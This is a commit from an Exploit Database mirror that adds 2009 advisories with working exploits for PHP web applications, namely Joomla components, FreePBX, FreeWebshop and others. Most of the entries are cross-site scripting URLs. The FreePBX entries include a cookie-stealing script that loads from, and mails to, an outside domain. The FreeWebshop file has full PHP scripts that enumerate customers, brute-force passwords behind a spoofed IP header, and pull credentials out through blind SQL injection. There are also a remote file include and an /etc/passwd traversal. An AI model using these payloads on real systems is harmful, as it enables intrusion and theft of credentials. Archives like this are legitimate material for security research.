bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_22_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-22 04:36:28 +00:00
parent 9d5f6d827f
commit 5b5e154bd7
13 changed files with 260 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -30123,3 +30123,15 @@ id,file,description,date,author,platform,type,port
33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 'MSP' Script Cross Site Scripting Vulnerability",2009-12-23,"Floyd Fuh",multiple,webapps,0
33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 'myps.php' Cross Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-12-28,MustLive,php,webapps,0
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 'dbhcms_core_dir' Parameter Remote File Include Vulnerability",2009-12-28,Securitylab.ir,php,webapps,0
33445,platforms/php/webapps/33445.txt,"phpInstantGallery 1.1 'admin.php' Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
33446,platforms/php/webapps/33446.txt,"Barbo91 'upload.php' Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
33447,platforms/php/webapps/33447.php,"FreeWebshop 2.2.9 R2 Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0
33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 'l' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0
33449,platforms/php/webapps/33449.txt,"Conkurent PHPMyCart 1.3 Cross Site Scripting and Authentication Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 Cross Site Scripting and Security Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 'recent.php' Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0
33452,platforms/php/webapps/33452.txt,"Imagevue r16 'amount' Parameter Cross-Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0

Can't render this file because it is too large.

7
platforms/php/webapps/33441.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37479/info
The Joomulus component for Joomla! is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3 E%3C/tags%3E

10
platforms/php/webapps/33442.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37482/info
FreePBX is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
FreePBX 2.5.2 is vulnerable; other versions may also be affected.
location.href='https://www.example.com/admin/admin/config.php?display=trunks&tech=%3C/script%3E%20%22%3E
%3Cscript%20src%3Dhttp%3A//global-evolution.info/etc/grep.php%3E%3C/script%3E?nice='+escape(document.cookie)

33
platforms/php/webapps/33443.txt Executable file
View file

@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/37482/info
FreePBX is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
FreePBX 2.5.2 is vulnerable; other versions may also be affected.
<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");
$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("notification@global-evolution.info", $subject, $msg);
header ("location: http://127.0.0.1:8080/admin/");
?>
<form name="editZapchandid" action="" method="post" onsubmit="return checkZapchandid(editZapchandid);">
<input type="hidden" name="extdisplay" value="">
<input type="hidden" name="channel" value="">
<input type="hidden" name="action" value="add">
<table><tr><td colspan="2"><h5>Add Channel<hr></h5></td></tr>
<tr><td><a href="#" class="info">Channel:<span>The Zap Channel number to map to a DID</span></a></td>
<td><input size="5" type="text" name="channel" value="" tabindex="1"></td>
</tr><tr><td><a href="#" class="info">Description:<span>A useful description describing this channel</span></a></td>
<td><input size="40" type="text" name="description" value="INSERT 0WN SCRIPTCODE HERE!!!" tabindex="2"></td>
</tr><tr><td><a href="#" class="info">DID:<span>The DID that this channel represents. The incoming call on this channel
will be treated as if it came in with this DID and can be managed with Inbound Routing on DIDs</span></a></td>
<td><input size="40" type="text" name="did" value="" tabindex="3"/></td>
</tr><tr><td colspan="2"><br><input name="Submit" type="submit" value="Submit Changes" tabindex="4">
</td></tr></table></form>

9
platforms/php/webapps/33444.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37498/info
DrBenHur.com DBHcms is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
DBHcms 1.1.4 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00

9
platforms/php/webapps/33445.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37502/info
phpInstantGallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpInstantGallery 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/instantgallery/admin.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

12
platforms/php/webapps/33446.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37512/info
Barbo91 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example URIs are available:
http://www.example.com/barbo91_uploads/upload.php?MAX_FILE_SIZE=1024000&UploadedFile=1<script>alert(213771818860)</script>
http://www.example.com/barbo91_uploads/upload.php?MAX_FILE_SIZE=1024000&UploadedFile=1<img+src=http://server/Hack.jpg+onload=alert(213771818860)>

114
platforms/php/webapps/33447.php Executable file
View file

@ -0,0 +1,114 @@
source: http://www.securityfocus.com/bid/37513/info
FreeWebshop is prone to multiple remote vulnerabilities:
1. A security vulnerability that may allow attackers to spoof HTTP headers.
2. A security vulnerability involving the handling of sessions.
3. A security vulnerability that may allow attackers to brute-force passwords.
4. A security-bypass vulnerability.
5. An SQL-injection vulnerability.
6. A directory-traversal vulnerability.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities, gain unauthorized access to the affected application, and obtain sensitive information.
FreeWebshop.org 2.2.9 R2 is vulnerable; other versions may also be affected.
<?php
$url = "http://127.0.0.1/index.php?page=cart&action=show";
$max = 1000;
for($customerid = 1; $customerid <= $max; $customerid++)
{
echo "<h3>Customerid: " . $customerid .
"</h3>\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "fws_guest=" . $customerid);
$result = curl_exec($ch);
curl_close($ch);
$result = str_replace("\n", "", $result);
preg_match("/(Wat zit er in uw winkelwagen.*)<\/table>/", $result,
$matches);
echo strip_tags($matches[1]);
}
?>
<?php
$url = "http://127.0.0.1/index.php?page=main";
$max = 1000;
$passwords = array("admin_1234", "admin", "password");
$ipspoof = "127.0.0.1";
for($customerid = 1; $customerid <= $max; $customerid++)
{
foreach($passwords as $password)
{
$cookie = "fws_cust=foobar-" . $customerid . "-" . md5(md5($password));
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-Forwarded-For: " .
$ipspoof . "\n"));
$result = curl_exec($ch);
curl_close($ch);
if(preg_match("/Persoonlijke pagina/", $result))
{
echo "Found password: " . $password . " for customerid: " .
$customerid . "<br>\n";
echo "Cookie: " . $cookie . "<br>\n";
}
}
}
?>
<?php
$url = "http://127.0.0.1/index.php?page=main";
$tablename = "fws_customer";
$fieldnames = array("LOGINNAME", "PASSWORD", "IP");
$userid = 1;
$loginname = "";
$password = "";
$ip = "";
foreach($fieldnames as $fieldname)
{
$index = 1;
echo $fieldname . ": ";
while(TRUE)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE,
"fws_cust=fubar-0)+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%
2CASCII(SUBSTRING(" .
$fieldname . "%2C" . $index . "%2C1))%2C8+FROM+" . $tablename .
"+WHERE+ID%3D" . $userid . "%2F*-md5");
$result = curl_exec($ch);
curl_close($ch);
preg_match("/Winkelwagen \((\d+)\)/", $result, $matches);
if(intval($matches[1]) == 0)
{
break;
}
switch($fieldname)
{
case "LOGINNAME":
$loginname .= chr($matches[1]);
break;
case "PASSWORD":
$password .= chr($matches[1]);
break;
case "IP":
$ip .= chr($matches[1]);
break;
}
echo chr($matches[1]);
$index++;
}
echo "<br>\n";
}
../../../../../../../etc/passwd%00

9
platforms/php/webapps/33448.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37514/info
Azerbaijan Development AzDGDatingMedium is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/datingscript/login.php?l=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
http://www.example.com/datingscript/search.php?l=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
http://www.example.com/datingscript/index.php?l=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>

11
platforms/php/webapps/33449.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37553/info
Conkurent PHPMyCart is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability.
An attacker may leverage these issues to gain unauthorized access to the affected application and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHPMyCart 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/sm-pmc13/sign_aff.php?pflag=add&name=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&email=indoushka%40example%2Ecom&addr=indoushka@example.com&submit=Submit
http://www.example.com/sm-pmc13/admin/indexa.php
http://www.example.com/sm-pmc13/admin/addn.php

15
platforms/php/webapps/33450.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/37554/info
SendStudio (also called Email Marketer) is prone to a cross-site scripting issue and a security-bypass issue.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site steal cookie-based authentication credentials and gain unauthorized administrative access to the affected application.
The vendor reports that Interspire Email Marketer 6 is not affected.
1- XSS (High)
http://www.example.com/wl-ssf41/admin/index.php/index?SID=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
2- Bay Pass (Medium)
http://www.example.com/wl-ssf41/admin/index.php/index?SID=xx

10
platforms/php/webapps/33451.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37555/info
BosClassifieds is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
BosClassifieds 1.20 is vulnerable; other versions may also be affected.
http://www.example.com/sm-bc120/recent.php?type=<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://www.example.com/sm-bc120/recent.php?type=<img+src=http://www.example.org/matrix.jpg+onload=alert(213771818860)>

9
platforms/php/webapps/33452.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37557/info
Imagevue is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue r16 is vulnerable; other versions may also be affected.
http://www.example.com/upload/admin/upload.php?amount=<img+src=http://127.0.0.1/dot.gif+onload=alert(213771818860)>&path=hacked%20by%20indoushka